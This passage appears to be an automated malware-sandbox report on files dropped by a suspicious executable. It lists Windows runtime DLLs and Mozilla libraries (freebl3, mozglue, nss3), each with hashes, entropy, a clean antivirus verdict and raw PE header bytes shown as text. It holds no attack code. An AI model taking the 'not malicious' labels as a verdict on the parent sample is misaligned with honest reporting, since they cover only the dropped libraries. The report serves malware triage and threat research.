                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):19256
                                                              Entropy (8bit):7.088693688879585
                                                              Encrypted:false
                                                              SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                              MD5:6EA692F862BDEB446E649E4B2893E36F
                                                              SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                              SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                              SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-convert-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22328
                                                              Entropy (8bit):6.929204936143068
                                                              Encrypted:false
                                                              SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                              MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                              SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                              SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                              SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18736
                                                              Entropy (8bit):7.078394808632259
                                                              Encrypted:false
                                                              SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4hWEApkqnajPBZ:bWPhWqXYi00GftpBjBemwl1z6h2
                                                              MD5:9E5A69C777D7E016E5BF8873C18ECAAD
                                                              SHA1:90BAB12FAFE4ABBE03A592C5E1D5B08B3108A3C0
                                                              SHA-256:6E61A7288F01B700F5E19936FE2FB771FEDAAC3037C3C3251D6C81BA4AABD959
                                                              SHA-512:9FE9AA82BEC4D6BAB9EFD474E8FA141354A48862FE1A73912398267093E51292D190018EB2760F1098B333F01F73D32C925EE94865CF0FB2EF3E91B1B1D16784
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-filesystem-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):20280
                                                              Entropy (8bit):7.085387497246545
                                                              Encrypted:false
                                                              SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                              MD5:AEC2268601470050E62CB8066DD41A59
                                                              SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                              SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                              SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):19256
                                                              Entropy (8bit):7.060393359865728
                                                              Encrypted:false
                                                              SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                                              MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                                              SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                                              SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                                              SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-locale-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18744
                                                              Entropy (8bit):7.13172731865352
                                                              Encrypted:false
                                                              SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                                              MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                                              SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                                              SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                                              SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):28984
                                                              Entropy (8bit):6.6686462438397
                                                              Encrypted:false
                                                              SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                                              MD5:8B0BA750E7B15300482CE6C961A932F0
                                                              SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                                              SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                                              SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):26424
                                                              Entropy (8bit):6.712286643697659
                                                              Encrypted:false
                                                              SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                                              MD5:35FC66BD813D0F126883E695664E7B83
                                                              SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                                              SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                                              SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-private-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):73016
                                                              Entropy (8bit):5.838702055399663
                                                              Encrypted:false
                                                              SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                                              MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                                              SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                                              SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                                              SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-process-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):19256
                                                              Entropy (8bit):7.076072254895036
                                                              Encrypted:false
                                                              SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                                              MD5:8D02DD4C29BD490E672D271700511371
                                                              SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                                              SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                                              SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-runtime-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22840
                                                              Entropy (8bit):6.942029615075195
                                                              Encrypted:false
                                                              SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                                              MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                                              SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                                              SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                                              SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-stdio-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24368
                                                              Entropy (8bit):6.873960147000383
                                                              Encrypted:false
                                                              SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                                              MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                                              SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                                              SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                                              SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23488
                                                              Entropy (8bit):6.840671293766487
                                                              Encrypted:false
                                                              SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                                              MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                                              SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                                              SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                                              SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-time-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):20792
                                                              Entropy (8bit):7.018061005886957
                                                              Encrypted:false
                                                              SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                                              MD5:849F2C3EBF1FCBA33D16153692D5810F
                                                              SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                                              SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                                              SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-utility-l1-1-0.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):18744
                                                              Entropy (8bit):7.127951145819804
                                                              Encrypted:false
                                                              SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                                              MD5:B52A0CA52C9C207874639B62B6082242
                                                              SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                                              SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                                              SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................

                                                              C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):332752
                                                              Entropy (8bit):6.8061257098244905
                                                              Encrypted:false
                                                              SSDEEP:6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
                                                              MD5:343AA83574577727AABE537DCCFDEAFC
                                                              SHA1:9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
                                                              SHA-256:393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
                                                              SHA-512:827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2fda\mozglue.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):139216
                                                              Entropy (8bit):6.841477908153926
                                                              Encrypted:false
                                                              SSDEEP:3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
                                                              MD5:9E682F1EB98A9D41468FC3E50F907635
                                                              SHA1:85E0CECA36F657DDF6547AA0744F0855A27527EE
                                                              SHA-256:830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
                                                              SHA-512:230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2fda\msvcp140.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):440120
                                                              Entropy (8bit):6.652844702578311
                                                              Encrypted:false
                                                              SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                              MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                              SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                              SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                              SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\2fda\nss3.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\No. 1349240400713.exe
